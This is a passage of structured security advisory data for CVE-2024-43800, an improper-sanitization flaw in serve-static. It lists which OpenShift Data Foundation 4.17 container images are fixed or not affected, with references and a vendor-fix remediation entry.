"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2311154", }, ], notes: [ { category: "description", text: "A flaw was found in serve-static. This issue may allow the execution of untrusted code via passing sanitized yet untrusted user input to redirect().", title: "Vulnerability description", }, { category: "summary", text: "serve-static: Improper Sanitization in serve-static", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", ], known_not_affected: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-43800", }, { category: "external", summary: "RHBZ#2311154", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311154", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-43800", url: "https://www.cve.org/CVERecord?id=CVE-2024-43800", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-43800", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-43800", }, { category: "external", summary: "https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b", url: "https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b", }, { category: "external", summary: "https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa", url: "https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa", }, { category: "external", summary: "https://github.com/expressjs/serve-static/security/advisories/GHSA-cm22-4g7w-348p", url: "https://github.com/expressjs/serve-static/security/advisories/GHSA-cm22-4g7w-348p", }, ], release_date: "2024-09-10T15:15:17.937000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-30T14:25:22+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", 